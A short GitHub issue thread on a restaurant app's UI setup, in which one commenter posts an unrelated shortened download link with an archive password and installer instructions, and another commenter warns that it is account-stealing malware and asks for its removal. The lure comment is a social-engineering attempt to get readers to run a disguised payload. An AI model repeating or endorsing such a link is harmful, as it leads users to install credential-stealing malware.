### ISSUE TITLE
Setup basic UI / app structure

### ISSUE THREAD

**Issue by dleurs** [dleurs/restaurant_app#2]

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by dleurs** [comment]
![image](https://github.com/user-attachments/assets/3f75df62-66a7-40d6-a410-b19eb6fd5aa0)
